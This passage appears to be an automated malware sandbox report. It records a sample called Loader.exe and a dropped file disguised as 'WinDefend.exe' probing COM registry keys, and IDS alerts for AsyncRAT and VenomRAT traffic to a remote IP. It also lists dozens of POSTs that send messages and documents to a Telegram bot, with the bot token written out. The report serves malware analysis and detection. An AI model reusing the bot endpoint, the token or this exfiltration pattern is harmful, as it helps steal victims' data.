Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]		22_2_0544D008
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]		22_2_0544AE9C

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 66.235.168.242:3232 -> 192.168.2.5:61009
Source: Traffic	Snort IDS: 2052265 ET TROJAN Observed Malicious SSL Cert (VenomRAT) 66.235.168.242:4449 -> 192.168.2.5:61010

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:61009 -> 66.235.168.242:3232

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 363Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="680d53c9-ebba-41ad-9250-1beb359e0683"Host: api.telegram.orgContent-Length: 5300Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 364Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="fec75c00-251d-4cb8-9c45-79b3df3c6196"Host: api.telegram.orgContent-Length: 4692Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 363Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 204Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="15d75943-c97b-479a-8ffa-c4a3776220dc"Host: api.telegram.orgContent-Length: 884Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f55f720b-4135-40c0-87de-817a9f7de06d"Host: api.telegram.orgContent-Length: 187231Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 171Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 351Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="fdb9ea01-1ae2-433c-a1ca-379b15d02c9c"Host: api.telegram.orgContent-Length: 731Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d131e3aa-cf24-430d-9771-63553786180d"Host: api.telegram.orgContent-Length: 2725Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 154Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e1a547f3-58c8-4c01-9faa-06be2ad112c9"Host: api.telegram.orgContent-Length: 468550Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="c9ea3915-752d-415a-b207-143db89b04e6"Host: api.telegram.orgContent-Length: 1955Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 351Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 181Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 154Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="617fa9fc-b519-4623-a5ab-ad420e993788"Host: api.telegram.orgContent-Length: 4037Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6025331e-f70c-4be9-81f7-bc188ef699dd"Host: api.telegram.orgContent-Length: 2733Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="2a68e35a-9d40-4e0a-9976-ab68846c28ec"Host: api.telegram.orgContent-Length: 468550Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 188Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 374Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 160Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="af669190-cc5a-412b-a104-c83d4e004a47"Host: api.telegram.orgContent-Length: 673Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="110de683-f34e-4774-8a2c-41f5f8a24236"Host: api.telegram.orgContent-Length: 516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f78550a6-a677-44a2-9e89-71f546a24bed"Host: api.telegram.orgContent-Length: 16076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 386Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 160Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="aabc68b0-0b54-4330-9a22-9260ea5a3656"Host: api.telegram.orgContent-Length: 955Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="ce3eefb3-86bf-4968-a35e-c20038f39fae"Host: api.telegram.orgContent-Length: 620Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="c651678e-ae3a-40a3-951b-c07009491b7f"Host: api.telegram.orgContent-Length: 29741Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 237Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 386Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 160Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="4a463c5b-b1f8-4ae6-b5a8-f7c39bea3160"Host: api.telegram.orgContent-Length: 5157Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="3c1241bd-4ab9-4d98-b7e6-c2f6c8b0721e"Host: api.telegram.orgContent-Length: 26578Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="68e19271-1a8c-4a96-bb7f-f989f15c0ebf"Host: api.telegram.orgContent-Length: 528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 237Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 171Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="ace3ea1e-b52e-4af8-b2cf-6e562ff36ead"Host: api.telegram.orgContent-Length: 9435Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9bbcc1e4-a650-43d4-8bc8-1ae3af992f7b"Host: api.telegram.orgContent-Length: 8280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="8cb98721-d75f-4598-b4e1-c08a62a90c3f"Host: api.telegram.orgContent-Length: 61700Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 233Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 155Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="794248ae-12fd-4b7b-bc57-e79898ae7f2a"Host: api.telegram.orgContent-Length: 3139Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="96735425-aaf7-4152-b267-6c98daa776a9"Host: api.telegram.orgContent-Length: 6007Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9dfbb0fb-9ca1-41ad-ac6e-08850e17be28"Host: api.telegram.orgContent-Length: 82396Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 233Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="189c1f2a-3378-4c39-b851-08cfff36ab50"Host: api.telegram.orgContent-Length: 4105Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="61fcfbab-ba2e-4b25-a79b-34d1c637f3c1"Host: api.telegram.orgContent-Length: 19912Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 159Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 177Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="19534887-ce91-4171-84c2-57443fed7b34"Host: api.telegram.orgContent-Length: 80981Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f2a56f47-f128-4051-8818-f094aa75114e"Host: api.telegram.orgContent-Length: 2446Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="76e745c7-b56c-4502-9c5d-96096f6bc769"Host: api.telegram.orgContent-Length: 2132Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 183Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e518a1a9-6cde-421c-b9a7-a1edbc30fa72"Host: api.telegram.orgContent-Length: 22687Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="426ff023-bd5d-4668-9bf7-e3b45dfa899e"Host: api.telegram.orgContent-Length: 13011Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="eb1ce6c3-ef84-4542-9110-d67001d0014a"Host: api.telegram.orgContent-Length: 3183Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 166Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 176Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="86970169-c32b-41e9-af9b-e0233f251799"Host: api.telegram.orgContent-Length: 112820Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="3e07cba2-404a-415c-837b-d92400b847d0"Host: api.telegram.orgContent-Length: 611Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 175Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="fc13998b-2668-43cd-9a22-6549072c4a27"Host: api.telegram.orgContent-Length: 4152Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 180Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d9eb4d47-46b1-4135-94d1-fd710121077f"Host: api.telegram.orgContent-Length: 57544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e713547f-3bad-4959-9563-b0ac38454858"Host: api.telegram.orgContent-Length: 889Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9b01aca3-bab5-4d8f-b243-d333c19c0bfc"Host: api.telegram.orgContent-Length: 6085Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 171Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 180Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="8bb134c7-bf6e-4aa8-a8b9-fc0060f8f956"Host: api.telegram.orgContent-Length: 33335Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7923b787-ff45-47a9-8643-9418ef7c0093"Host: api.telegram.orgContent-Length: 632Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 177Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="8b792bf8-c0c2-42be-bf27-b3ebe8d1efc5"Host: api.telegram.orgContent-Length: 10382Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 186Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f3440d2e-f13b-425e-9f40-142dcb442079"Host: api.telegram.orgContent-Length: 47225Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b22b7fb5-d676-4870-bff8-d4e2876d7f5d"Host: api.telegram.orgContent-Length: 29920Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="29abcbe2-df31-4261-85ff-4f986c0f4e56"Host: api.telegram.orgContent-Length: 7273Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 177Expect: 100-continue
